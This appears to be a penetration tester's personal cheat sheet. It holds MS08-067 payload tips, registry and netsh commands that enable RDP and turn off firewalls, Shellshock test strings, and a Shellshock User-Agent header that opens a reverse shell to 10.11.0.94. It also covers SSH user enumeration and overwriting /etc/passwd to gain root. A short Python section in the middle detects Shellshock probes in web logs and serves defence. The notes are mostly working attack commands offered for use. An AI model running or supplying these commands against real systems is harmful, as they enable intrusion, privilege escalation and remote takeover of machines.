# Notes

If the MS08-067 exploit is present but the target cannot be exploited, or an encoding error is returned, change the payload. Use smaller payloads such as windows/shell\_reverse\_tcp; do not use meterpreter. If the payload is too large, Metasploit fails with "Exploit failed: No encoders encoded the buffer successfully."

**If the administrator account is disabled, the error `STATUS_USER_SESSION_DELETED` is returned.**

## Enable RDP

```
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
```

If the user does not exist:

ERROR: Failed to open connection - NT\_STATUS\_LOGON\_FAILURE

If the user exists but lacks the required privileges, the error is:

Cannot connect to svcctl pipe. NT\_STATUS\_ACCESS\_DENIED.

For the exploit to succeed it needs access to the IPC$ share.

"You just need access to the IPC$ share, not a named pipe."

### Disable Firewall

```
XP:
netsh firewall set opmode mode=DISABLE

New Windows Ver:
netsh advfirewall set allprofiles state off
```

### Compile C code to exe in Linux

```
i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe
```

### ShellShock

```
env x='() { :;}; echo vulnerable' bash -c "ps aux"
env x='() { :;}; /usr/bin/id' /bin/bash -c "/usr/bin/id"
/usr/bin/env x='() { :;}; /usr/bin/id' /bin/bash -c "ps aux"
```

Find files writable by the current user: `find / -writable -type f 2>/dev/null | grep -v ^/proc`

Find files with the setuid bit set (`-perm -4001` matches setuid plus world-execute): `/bin/find / -perm -4001 -type f 2>/dev/null`

### Shellshock via HTTP header

```
User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/10.11.0.94/1234 0>&1
```
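Detecting the Shellshock probes shown above in a web server's access log, as an added example that is not part of the original notes. The log lines are constructed in Apache combined format, and the probe strings reuse the `() { :;};` function-definition prefix from the commands above.

```python
import re

# CVE-2014-6271 trigger: an exported variable whose value starts with a
# bash function definition "() { :;};" followed by trailing commands.
# Whitespace is optional around each token to catch spacing variants.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{\s*:?\s*;?\s*\}\s*;")

# Apache combined log format: client, identity, user, time, request,
# status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample log (not from a real server).
SAMPLE_LOG = [
    # Benign request
    '10.0.0.5 - - [10/Oct/2014:13:55:36 +0000] "GET /index.html HTTP/1.1" '
    '200 2326 "-" "Mozilla/5.0"',
    # Probe in User-Agent, same string as the notes above
    '10.0.0.9 - - [10/Oct/2014:13:55:40 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '200 512 "-" "() { :;}; /usr/bin/id"',
    # Spacing variant carried in the Referer header instead
    '10.0.0.9 - - [10/Oct/2014:13:55:41 +0000] "GET /cgi-bin/status HTTP/1.1" '
    '500 0 "() {:; }; echo vulnerable" "curl/7.35"',
]


def scan_log(lines):
    """Return one finding per log line whose User-Agent, Referer or
    request line carries a Shellshock function-definition prefix.
    Each finding records the client IP, the header that carried the
    payload and the request it targeted (CGI paths are the usual vector)."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("ua", "ref", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                findings.append({"ip": m.group("ip"), "field": field,
                                 "request": m.group("req"),
                                 "status": int(m.group("status"))})
                break  # one finding per line is enough
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

A 200 status on a flagged CGI request deserves a closer look than a 500, since the handler accepted the request; the header fields are the place to look because CGI exports them as environment variables, which is exactly where bash parsed the definition.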

### Add directory to PATH

```
export PATH=$PATH:/usr/bin/
```

### Samba version

```
msf > use auxiliary/scanner/smb/smb_version
```

### 32-bit and 64-bit C and C++ cross-compilation in Linux

```
# C
i686-w64-mingw32-gcc hello.c -o hello32.exe      # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe    # 64-bit
 
# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe     # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe   # 64-bit
```

### ssh user enumeration

```
for user in $(cat users.txt); do python sshuserenum.py --username $user IP; done
```

### udev 2.6

[udev exploit tutorial](https://blackwintersecurity.com/tutorials/)

### If /etc/passwd is writable

```
$ echo root::0:0:root:/root:/bin/bash > /etc/passwd
```

then:

```
su
```

root is gained!

### Writable files and directories

```
find / -writable -type d 2>/dev/null
find / -writable -type f 2>/dev/null
```

